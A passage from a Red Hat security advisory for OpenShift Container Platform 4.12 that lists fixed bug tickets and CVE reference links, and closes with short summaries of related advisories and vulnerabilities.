Improve ironic logging configuration in metal3OCPBUGS-4339 - oc get dc fails when AllRequestBodies audit-profile is set in apiserverOCPBUGS-4342 - The storage account for the CoreOS image is publicly accessible when deploying fully private cluster on AzureOCPBUGS-435 - Dropdown items on storageclass creation page need i18n supportOCPBUGS-4356 - Reply packet for DNS conversation to service IP uses pod IP as sourceOCPBUGS-4361 - [release-4.12] bp ovnkube-trace changes to 4.12OCPBUGS-4362 - Hard eviction thresholds is different with k8s default when PAO is enabledOCPBUGS-4365 - `oc-mirror` will hit error when use docker without namespace for OCI format mirrorOCPBUGS-4366 - Update Kubernetes to 1.25.4OCPBUGS-4369 - Update Cluster Sample Operator dependencies and libraries for OCP 4.13OCPBUGS-4379 - apply retry logic to ovnk-node controllersOCPBUGS-4383 - Don't log in iterateRetryResources when there are no retry entriesOCPBUGS-439 - DVO gatherer relies on the namespace nameOCPBUGS-4397 - Route/v1 defaulting for target kind and termination must be sharable between openshift-apiserver and kube-apiserverOCPBUGS-4399 - Adding back SKIP_INTERFACESOCPBUGS-4407 - Update Cluster Sample Operator dependencies and libraries for OCP 4.13OCPBUGS-4414 - [OCI feature] registries.conf support in oc mirrorOCPBUGS-4421 - Dockerfile for building ironic-image for OKD does not take into account variant scosOCPBUGS-4422 - Implement LIST call chunking in openshift-sdnOCPBUGS-4431 - KubePodNotReady - Increase Tolerance During Master Node RestartsOCPBUGS-4453 - metal-ipi upgrade success rate dropped 30+% in last weekOCPBUGS-4458 - Node Terminal tab results in errorOCPBUGS-4478 - Backport: Guard Pod Hostnames Too Long and Truncated Down Into Collisions With Other MastersOCPBUGS-4479 - [4.12] Dockerfile for building ironic-image for OKD does not take into account variant scosOCPBUGS-4484 - `oc-mirror` will hit error when use docker without namespace for OCI format mirrorOCPBUGS-4488 - Prometheus and Alertmanager incorrect ExternalURL configuredOCPBUGS-4489 - Prometheus continuously restarts due to slow WAL replayOCPBUGS-4499 - CSR are generated with incorrect Subject Alternate NamesOCPBUGS-4503 - [4.12] [OVNK] Add support for service session affinity timeoutOCPBUGS-4504 - Default to floating automaticRestart for new GCP instancesOCPBUGS-4505 - [4.12] Pod stuck in containerCreating state when the node on which it is running is TerminatedOCPBUGS-451 - Show Git icon in repository link in details page should be based on the git providerOCPBUGS-4526 - hypershift: csi-snapshot-controller uses wrong kubeconfigOCPBUGS-4527 - hypershift: aws-ebs-csi-driver-operator uses wrong kubeconfigOCPBUGS-4533 - [release-4.12] OVNK: NAT issue for packets exceeding check_pkt_larger() for NodePort services that route to hostNetworked podsOCPBUGS-454 - [vsphere] update install-config description for diskTypeOCPBUGS-4544 - Remove debug level logging on openshift-config-operatorOCPBUGS-4547 - CVE-2021-38561 ose-installer-container: golang: out-of-bounds read in golang.org/x/text/language leads to DoS [openshift-4]OCPBUGS-4554 - [4.12] OVN silently failing in case of a stuck podOCPBUGS-456 - [4.12] update all ironic related packages to latest bugfixOCPBUGS-4599 - Bump samples operator k8s dep to 1.25.2 for 4.12OCPBUGS-4601 - `oc-mirror` does not work as expected relative path for OCI format copy OCPBUGS-4627 - doc link in PrometheusDataPersistenceNotConfigured message is 4.8OCPBUGS-4637 - Support RHOBS monitoring for HyperShift in CNOOCPBUGS-4649 - No indication of early installation failuresOCPBUGS-4653 - [4.12] Fixes for RHCOS 9 based on RHEL 9.0OCPBUGS-4660 - Debug log messages missing from output and Info messages malformedOCPBUGS-4667 - vsphere-hostname should check that /etc/hostname is not emptyOCPBUGS-4681 - [release-4.12] remove unnecessary RBAC in KCMOCPBUGS-4686 - Removal of detection of host kubelet kubeconfig breaks IBM Cloud ROKSOCPBUGS-469 - OVN master trying to deleteLogicalPort for object which is already goneOCPBUGS-4696 - [4.12] SNO not able to bring up Provisioning resource in 4.11.17OCPBUGS-4698 - Some nmstate validations are skipped when NM config is in agent-config.yamlOCPBUGS-4721 - GCP: missing me-west1 regionOCPBUGS-4760 - [4.12] Network Policy executes duplicate transactions for every pod updateOCPBUGS-4763 - Revert Catalog PSA decisions for 4.13 (Marketplace)OCPBUGS-4766 - limit cluster-policy-controller RBAC permissionsOCPBUGS-4779 - Update openshift/builder release-4.12 to go1.19OCPBUGS-478 - ironic-machine-os-downloader image is missing virt-* tools in OCP 4.12 nightliesOCPBUGS-4783 - [4.12] egressIP annotations not present on OpenShift on Openstack multiAZ installationOCPBUGS-4784 - [4.12] egressIP annotation including two interfaces when multiple networksOCPBUGS-4789 - [OCP 4.12] ironic container images have old packagesOCPBUGS-4796 - OLM generates invalid component selector labelsOCPBUGS-4803 - Update formatting with gofmt for go1.19OCPBUGS-4805 - Empty/missing node-sizing SYSTEM_RESERVED_ES parameter can result in kubelet not startingOCPBUGS-4808 - Use shared library in admission to default Routes served via CRDOCPBUGS-4837 - [4.12] Pod LSP missing from PortGroupOCPBUGS-4840 - [4.12] The property TransferProtocolType is required for VirtualMedia.InsertMediaOCPBUGS-4847 - OnDelete update strategy create two replace machines when deleting a master machineOCPBUGS-4869 - AWS Deprovision Fails with unrecognized elastic load balancing resource type listener OCPBUGS-4884 - [4.12] Pods completed + deleted may leakOCPBUGS-4897 - Developer Topology always blanks with large contents when first renderingOCPBUGS-4911 - [Azure]Availability Set will be created when vmSize is invalid in a region which has zonesOCPBUGS-4943 - Need to wait longer for VM to obtain IP from DHCPOCPBUGS-4951 - OLM K8s Dependencies should be at 1.25OCPBUGS-4962 - openshift-install agent wait-for install-complete errors out before the cluster installation completesOCPBUGS-498 - Update console operator vendor with latest openshift/apiOCPBUGS-499 - ClusterOperator Conditions Update on ReorderingOCPBUGS-5019 - Fails to deprovision cluster when swift omits 'content-type' and there are empty containersOCPBUGS-505 - Input box aria-label and name wrong for editing PDB inside DeploymentsOCPBUGS-5067 - [4.12] coreos-installer output not available in the logsOCPBUGS-5072 - [4.12] ironic-proxy daemonset not deleted when provisioningNetwork is changed from Disabled to Managed/UnmanagedOCPBUGS-5100 - virtual media provisioning fails when iLO Ironic driver is usedOCPBUGS-514 - [OCPonRHV] CSI provisioned disks are effectively preallocated due to go-ovirt-client setting Provisioned and Initial size of the disk to the same valueOCPBUGS-5143 - provisioning on ilo4-virtualmedia BMC driver fails with error: "Creating vfat image failed: Unexpected error while running command"OCPBUGS-5156 - [release-4.12] Azure: unable to configure EgressIP if an ASG is setOCPBUGS-5185 - Dev Sandbox clusters uses clusterType OSD and there is no way to enforce DEVSANDBOXOCPBUGS-519 - publicIP is allowed in Azure disconnected installation for machinesOCPBUGS-5190 - Installer - provisioning interface on master node not getting ipv4 dhcp ip address from bootstrap dhcp server on OCP IPI BareMetal installOCPBUGS-5191 - Add support for API version v1beta1 for knativeServing and knativeEventingOCPBUGS-523 - Plugin page error boundary message is not cleared after leaving pageOCPBUGS-525 - Prerelease report bug link should be updated to JIRA instead of BugzillaOCPBUGS-5253 - Missing 'ImageContentSourcePolicy' and 'CatalogSource' in the oci fbc feature implementationOCPBUGS-527 - Misleading error message when lacking assets to create the installation imageOCPBUGS-5289 - Multus: Interface name contains an invalid character / [ocp 4.12]OCPBUGS-533 - member loses rights after some other user loginOCPBUGS-5384 - Old AWS boot images vs. 4.12: unknown provider 'ec2'OCPBUGS-5387 - EUS upgrade: rpm-ostree clean up timeout was reachedOCPBUGS-540 - Input values in Instantiate Template are disappeared randomly in the developer consoleOCPBUGS-5417 - Upgrade from 4.11 to  4.12 with Windows machine workers (Spot Instances) failing due to: hcnCreateEndpoint failed in Win32: The object already exists.OCPBUGS-5442 - Placeholder bug for OCP 4.12.0 microshift releaseOCPBUGS-5444 - Reported vSphere Connection status is misleadingOCPBUGS-5455 - Baremetal host data is still sometimes requiredOCPBUGS-5474 - [4.12]Default CatalogSource aren't created in restricted modeOCPBUGS-548 - The application dropdown menu uses a custom component with a configuration to favorite applications, similar to the Project selection menu, but is inconsistent in the way it looks and behaves.OCPBUGS-561 - [4.12] Bootimage bump trackerOCPBUGS-569 - CVO History Pruner is non-functional, letting history length above MaxHistoryOCPBUGS-575 - The lacking securityContext.seccompProfile.type of OLM deployments is blocking OCP upgrade to 4.12OCPBUGS-576 - unbound router_id variable while creating eventOCPBUGS-585 - Tuned overwriting IRQBALANCE_BANNED_CPUSOCPBUGS-595 - Kubelet cannot be started on worker nodes after upgrade to OCP 4.11 (RHCOS 8.6) when custom SELinux policies are appliedOCPBUGS-613 - oc adm inspect --rotated-pod-logs not working properly for static podsOCPBUGS-617 - oc-mirror does not mirror arm64 OCP release payloadOCPBUGS-643 - catsrc is not ready due to "compute digest: compute hash: write tar: open /tmp/cache/cache: permission denied"OCPBUGS-650 - "opm alpha render-veneer semver" raise error when no "Candidate" in config yamlOCPBUGS-651 - CBO gets confused by Terminating ports when a master failsOCPBUGS-670 - Prefer local dns does not work expectedly on OCPv4.12OCPBUGS-675 - panic in etcdcliOCPBUGS-69 - No event log was emitted when egressIP exceeds capacity limit for cloud providers with SDN pluginOCPBUGS-690 - [2112237] [ Cluster storage Operator 4.x(10/11/12) ] DefaultStorageClassController report fake message "No default StorageClass for this platform" on Alicloud, IBM, NutanixOCPBUGS-705 - vSphere privilege checking failing when providing user-defined folder and/or resource poolOCPBUGS-706 - [IBMCloud] e2e-ibmcloud-ipi-ibmcloud-gather-resources failsOCPBUGS-716 - EventsRecorder nonstandard / log onlyOCPBUGS-717 - Inquiries from customers regarding the EOL of Python 3.7.OCPBUGS-718 - Inefficient use of SG rules when creating Service LBs leads to scale issuesOCPBUGS-722 - Undiagnosed panic detected in pod: openshift-controller-manager-operator_openshift-controller-manager-operator invalid memory address or nil pointer dereferenceOCPBUGS-729 - vsphere privilege check fails on vsphere6.7 u3 as missing privilege "InventoryService.Tagging.ObjectAttachable" OCPBUGS-745 - [4.12] Supermicro server FirmwareSchema CR does not contain allowable_values, attribute_type and read_only flagOCPBUGS-753 - dns-default pod missing "target.workload.openshift.io/management:" annotationOCPBUGS-766 - Missing the instance-type/region/zone labels in Machine CRsOCPBUGS-78 - Uninstalled operator can't be reinstalled if it included a conversion webhookOCPBUGS-785 - Bump documentationBaseURL to 4.12OCPBUGS-800 - Name of workload get changed, when project and image stream gets changed on reloading the form on the edit deployment page of the workloadOCPBUGS-819 - [ExtDNS] Invalid TXT records for wildcard domains on AzureOCPBUGS-825 - Available=False with no reasonOCPBUGS-850 - Dockerfile: provide full URL to CentOS stream image OCPBUGS-852 - oc debug requires a user to create a namespace with specific security labelsOCPBUGS-853 - openshift-ingress-operator is failing to update router-certs because "Too long: must have at most 1048576 bytes" messageOCPBUGS-858 - package-server-manager does not migrate packageserver CSV from v0.17.0 to v0.18.3 on OCP 4.8 -> 4.9 upgradeOCPBUGS-861 - Rebase openshift/etcd 4.12 onto v3.5.5OCPBUGS-864 - ClusterOperator Conditions Update on ReorderingOCPBUGS-867 - package-server-manager does not stomp on changes made to packgeserver CSVOCPBUGS-869 - Change 'OpenShift Managed (Azure)' to 'Azure Red Hat OpenShift' for Azure support case linkOCPBUGS-872 - provisioning interface on master node not getting ipv4 dhcp ip address from bootstrap dhcp server on OCP IPI BareMetal installOCPBUGS-884 - Update RHCOS release browser urlOCPBUGS-889 - 4.12 installer is pointing at stable-4.11 channelOCPBUGS-917 - create egressqos with wrong syntax/value rules successOCPBUGS-926 - [vsphere-problem-detector] report privilege missing when using pre-existing folder and/or resource pool with ReadOnly permissionOCPBUGS-927 - Azure install fails in CI: Error: error creating/updating Private DNS Zone Virtual network link OCPBUGS-929 - The help message of "opm alpha render-graph" is not correctOCPBUGS-939 - Flaky CI: Object.verifyTopologyPage timeout after importing a DevfileOCPBUGS-943 - Could not import Devfile after testing a non-Devfile versionOCPBUGS-944 - CI failure due to pod security in manilaOCPBUGS-946 - Warnings in storage cluster operator PowerVS CSI driver deployment OCPBUGS-954 - [2087981] PowerOnVM_Task is deprecated use PowerOnMultiVM_Task for DRS ClusterRecommendationOCPBUGS-959 - Born in 4.1 and 4.2 clusters have 'openshift.io/run-level: 1' unclearedOCPBUGS-963 - [OCPonOpenstack] Remove clustername length limitationOCPBUGS-967 - Panic in test:  [sig-network] IngressClass [Feature:Ingress] should prevent Ingress creation if more than 1 IngressClass marked as default [Serial] [Suite:openshift/conformance/serial] OCPBUGS-977 - SR-IOV MutiNetworkPolicy: Rules are not removed after disabling multinetworkpolicyOCPBUGS-978 - leases not gracefully released in OCMOCPBUGS-985 - Metal serial tests are failing on webhook admission about provisioningDHCPRangeOCPBUGS-987 - Whereabouts should allow non default interfaces to Pod IP listOCPBUGS-990 - HyperShift 4.12 jobs fail to install csi-snapshot-controller-operatorOCPBUGS-999 - aws driver toolkit jobs are permafailing6. References:https://access.redhat.com/security/cve/CVE-2021-4235https://access.redhat.com/security/cve/CVE-2021-22570https://access.redhat.com/security/cve/CVE-2021-38561https://access.redhat.com/security/cve/CVE-2022-1705https://access.redhat.com/security/cve/CVE-2022-2879https://access.redhat.com/security/cve/CVE-2022-2880https://access.redhat.com/security/cve/CVE-2022-2995https://access.redhat.com/security/cve/CVE-2022-3162https://access.redhat.com/security/cve/CVE-2022-3172https://access.redhat.com/security/cve/CVE-2022-3259https://access.redhat.com/security/cve/CVE-2022-3466https://access.redhat.com/security/cve/CVE-2022-21698https://access.redhat.com/security/cve/CVE-2022-24302https://access.redhat.com/security/cve/CVE-2022-27664https://access.redhat.com/security/cve/CVE-2022-30631https://access.redhat.com/security/cve/CVE-2022-32148https://access.redhat.com/security/cve/CVE-2022-32189https://access.redhat.com/security/cve/CVE-2022-32190https://access.redhat.com/security/cve/CVE-2022-41316https://access.redhat.com/security/cve/CVE-2022-41715https://access.redhat.com/security/cve/CVE-2022-42010https://access.redhat.com/security/cve/CVE-2022-42011https://access.redhat.com/security/cve/CVE-2022-42012https://access.redhat.com/security/cve/CVE-2022-42898https://access.redhat.com/security/cve/CVE-2023-0296https://access.redhat.com/security/updates/classification/#moderate7. Contact:The Red Hat security contact is <[email protected]>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2023 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY8cih9zjgjWX9erEAQiIYQ//X7Lt5e0g8KIXbD6sX0PYCogFU5JFv+JbJFhm235UL7vKT3tiwFMpGCW32SGmEa/qMfyvKtSoIrN847JHYQWFz1fOAqKC1fxsOqE99PPhjKeJ0a10OXtcQPaQwkXJIYxVpbInHdVjdPh88FtYVgIgR8zUjlcrMFIhtJLW6A7c26i/Njc2I2I/edPbb39jeygc4ZJIqekGgaQbu15dyIEa8GKGQ66Hy7tpr48TT7bXRsOdaxeiz7tFpVZDRdA4k3ktXveBPo1TKA8TG78ior1jIBdoS6DHniyCEAl09ilLgKa3rkuoLtmp6PIe5b95m0xgfUtanJSBK9sI3+yzlz3ITRkVKbSfXRndCFfb5lJB8ul2p9/f+ZAFc29HQdNS8ohU/NZ/7Ij34d5Xvh0pob62yg8LF444ZOGZKpP1T6o1JbW2IsVFO9kmAztDAk94VqKLD608EsnC1P3VWEBF9qBenCTITlqQM/OaH9LUNUGj0A2LS7j0GK0344bII0W65MKfcPIQ+SCyOTgVfxzlDspQEVhR1HoepxuGeUcicIFWYcaJ7jUTdHcLfwewiCr8hdx2v1F/6UQmuBpgA5bNJkGvjRgh1YwGUcJUVrGt6Nl647UKLzwCbLxDjQSDbwr+K+kJhqCd+umNz5iPuRYurcDemALy+HLy9Gid1ZZ25YS8Xvk==oXLl-----END PGP SIGNATURE-------RHSA-announce mailing [email protected]://listman.redhat.com/mailman/listinfo/rhsa-announce

Related news

Red Hat Security Advisory 2024-0485-03

Red Hat Security Advisory 2024-0485-03 - Red Hat OpenShift Container Platform release 4.12.48 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a cross site scripting vulnerability.

CVE-2022-3172: CVE-2022-3172: Aggregated API server can cause clients to be redirected (SSRF) · Issue #112513 · kubernetes/kubernetes

A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the client performing unexpected actions as well as forwarding the client's API server credentials to third parties.

Gentoo Linux Security Advisory 202309-06

Gentoo Linux Security Advisory 202309-6 - Multiple vulnerabilities have been discovered in Samba, the worst of which could result in root remote code execution. Versions greater than or equal to 4.18.4 are affected.

CVE-2022-3466

The version of cri-o as released for Red Hat OpenShift Container Platform 4.9.48, 4.10.31, and 4.11.6 via RHBA-2022:6316, RHBA-2022:6257, and RHBA-2022:6658, respectively, included an incorrect version of cri-o missing the fix for CVE-2022-27652, which was previously fixed in OCP 4.9.41 and 4.10.12 via RHBA-2022:5433 and RHSA-2022:1600. This issue could allow an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. For more details, see https://access.redhat.com/security/cve/CVE-2022-27652.

Red Hat Security Advisory 2023-4674-01

Red Hat Security Advisory 2023-4674-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.30.

Red Hat Security Advisory 2023-4488-01

Red Hat Security Advisory 2023-4488-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.

Red Hat Security Advisory 2023-4053-01

Red Hat Security Advisory 2023-4053-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.45. Issues addressed include a code execution vulnerability.

GHSA-9mh8-9j64-443f: HashiCorp Vault's revocation list not respected

HashiCorp Vault and Vault Enterprise’s TLS certificate auth method did not initially load the optionally configured CRL issued by the role's CA into memory on startup, resulting in the revocation list not being checked if the CRL has not yet been retrieved. Fixed in 1.12.0, 1.11.4, 1.10.7, and 1.9.10.

Red Hat Security Advisory 2023-3915-01

Red Hat Security Advisory 2023-3915-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.44.

Red Hat Security Advisory 2023-3615-01

Red Hat Security Advisory 2023-3615-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.22. Issues addressed include a denial of service vulnerability.

RHSA-2023:3615: Red Hat Security Advisory: OpenShift Container Platform 4.12.22 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.22 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: A flaw was found in go-yaml. This issue occurs due to unbounded alias chasing, where a maliciously crafted YAML file can cause the system to consume significant system resources. If p...

Red Hat Security Advisory 2023-3742-02

Red Hat Security Advisory 2023-3742-02 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. Issues addressed include bypass, denial of service, and remote SQL injection vulnerabilities.

RHSA-2023:3742: Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.13.0 security and bug fix update

Updated images that include numerous enhancements, security, and bug fixes are now available in Red Hat Container Registry for Red Hat OpenShift Data Foundation 4.13.0 on Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-16250: A flaw was found in Vault and Vault Enterprise (“Vault”). In the affected versions of Vault, with the AWS Auth Method configured and under certain circumstances, the values relied upon by Vault to validate AWS IAM ident...

Red Hat Security Advisory 2023-3644-01

Red Hat Security Advisory 2023-3644-01 - Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers container images for the release.

Red Hat Security Advisory 2023-3609-01

Red Hat Security Advisory 2023-3609-01 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform.

RHSA-2023:3644: Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.0

Red Hat OpenShift Service Mesh Containers for 2.4.0 Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-24540: A flaw was found in golang, where not all valid JavaScript white-space characters were considered white space. Due to this issue, templates containing white-space characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.

RHSA-2023:3609: Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.12.4 security and Bug Fix update

Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.12.4 on Red Hat Enterprise Linux 8 from Red Hat Container Registry. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-3172: A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This issue leads to the client performing unexpected actions and forwarding the client's API server credentials to third parties.

RHSA-2023:3541: Red Hat Security Advisory: OpenShift Container Platform 4.11.43 packages and security update

Red Hat OpenShift Container Platform release 4.11.43 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.11. Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2995: Incorrect handling of the supplementary groups in the CRI-O container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct acc...

Red Hat Security Advisory 2023-3216-01

Red Hat Security Advisory 2023-3216-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.10.60.

RHSA-2023:3296: Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.2.4 security fixes and container updates

Multicluster Engine for Kubernetes 2.2.4 General Availability release images, which fix security issues and update container images. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-32313: A flaw was found in the vm2. After making a vm, the inspect method is read-write for console.log, which allows an attacker to edit options for console.log. This issue impacts the integrity by changing the log subsystem. * CVE-2023-32314: A flaw was found in the vm2 sandbox. When a host ...

RHSA-2023:3216: Red Hat Security Advisory: OpenShift Container Platform 4.10.60 packages and security update

Red Hat OpenShift Container Platform release 4.10.60 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.10. Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2995: Incorrect handling of the supplementary groups in the CRI-O container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct acc...

CVE-2023-23694: DSA-2023-071: Dell VxRail Security Update for Multiple Third-Party Component Vulnerabilities – 7.0.450

Dell VxRail versions earlier than 7.0.450, contain(s) an OS command injection vulnerability in VxRail Manager. A local authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.

RHSA-2023:0584: Red Hat Security Advisory: Secondary Scheduler Operator for Red Hat OpenShift 1.1.1 security update

Secondary Scheduler Operator for Red Hat OpenShift 1.1.1 Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2880: A flaw was found in the golang package, where requests forwarded by reverse proxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This issue could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After the fix, the reverse proxy sanitizes the query ...

Red Hat Security Advisory 2023-1325-01

Red Hat Security Advisory 2023-1325-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.0. Issues addressed include bypass, denial of service, and information leakage vulnerabilities.

Red Hat Security Advisory 2023-1328-01

Red Hat Security Advisory 2023-1328-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include denial of service and out of bounds read vulnerabilities.

Red Hat Security Advisory 2023-1326-01

Red Hat Security Advisory 2023-1326-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.0. Issues addressed include bypass, denial of service, information leakage, out of bounds read, and remote SQL injection vulnerabilities.

RHSA-2023:3204: Red Hat Security Advisory: OpenShift Virtualization 4.13.0 RPMs security and bug fix update

Red Hat OpenShift Virtualization release 4.13.0 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-27664: A flaw was found in the golang package. In net/http in Go, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if a fatal error preempts the shutdown. * CVE-2022-32149: A vulnerability was found in the golang.org/x/text/language pack...

RHSA-2023:1325: Red Hat Security Advisory: OpenShift Container Platform 4.13.0 security update

Red Hat OpenShift Container Platform release 4.13.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.13. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-2990: An incorrect handling of the supplementary groups in the Buildah container engine might lead to the sensitive information disclosure or possible data modification if an attacker has d...

RHSA-2023:1326: Red Hat Security Advisory: OpenShift Container Platform 4.13.0 security update

Red Hat OpenShift Container Platform release 4.13.0 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.13. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: A flaw was found in go-yaml. This issue occurs due to unbounded alias chasing, where a maliciously crafted YAML file can cause the system to consume significant system resources. If p...

Red Hat Security Advisory 2023-1327-01

Red Hat Security Advisory 2023-1327-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.0.

RHSA-2023:2780: Red Hat Security Advisory: Image Builder security, bug fix, and enhancement update

